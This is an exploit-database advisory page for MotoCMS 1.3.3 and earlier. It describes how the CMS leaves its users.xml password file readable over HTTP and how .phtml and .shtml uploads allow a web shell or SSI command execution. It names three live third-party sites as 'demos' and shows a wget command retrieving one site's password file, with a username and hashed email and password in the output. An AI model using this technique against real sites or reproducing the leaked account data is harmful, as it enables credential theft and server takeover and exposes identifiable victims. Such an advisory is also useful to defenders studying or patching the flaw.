MotoCMS <=1.3.3 Password File disclosure & Code/Command execution

2013.01.09
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm AkaStep member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ================================================= Software: MotoCMS Official Site: http://www.motocms.com/ Vulns: MotoCMS <=1.3.3 Password File disclosure && Code/Command execution Software license: Commercial ================================================= About Software: MotoCMS is an advanced Flash CMS that allows Flash developers and the users with no programming skills to easily create stunning Flash websites. ================================================= About vulns: Design flaw. Trouble N1: This software is prone to password file disclosure vulnerability. Because it fails to protect sensitive data from HTTP ACCESS. Trouble N2: In this CMS some filetypes: (php5,php is not allowed to upload) But .phtml, .shtml is allowed. Using 2'nd issuse this is possible to upload shell (via .phtml) and also possible execute server commands via SSI #exec directive (if enabled on server side or include directive in ex to read files). Some Demos: http://kattmodXls.com/admin/data/users.xml http://www.atxcfc.ca/admin/data/users.xml http://ustanoXvka-spb.ru/admin/data/users.xml $ wget --user-agent="Mozilla Firefox 3 Gecko 12" http://kattmodels.com/admin/data/users.xml && cat user*.xml --2013-01-09 06:10:11-- http://kattmodels.com/admin/data/users.xml Resolving kattmodels.com (kattmodels.com)... 208.109.47.128 Connecting to kattmodels.com (kattmodels.com)|208.109.47.128|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 187 [application/xml] Saving to: `users.xml' 100%[==============>] 187 --.-K/s in 0s 2013-01-09 06:10:16 (2.75 MB/s) - `users.xml' saved [187/187] <?xml version="1.0" encoding="UTF-8"?> <users> <user id="1263066591" name="pmanoloutsos" email="cb6afd35d37afd07dfcfdcb45e80026b" password="38740d1f9877b41f784a0859604c2d3c"/> </users> ================================================= ==GUNUN RANDOM SITATI:======GOTDU OGUL ISTEREM! LOOOOOOOL=== =============== KUDOSSSSSSS: =============== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep

References:

http://www.motocms.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top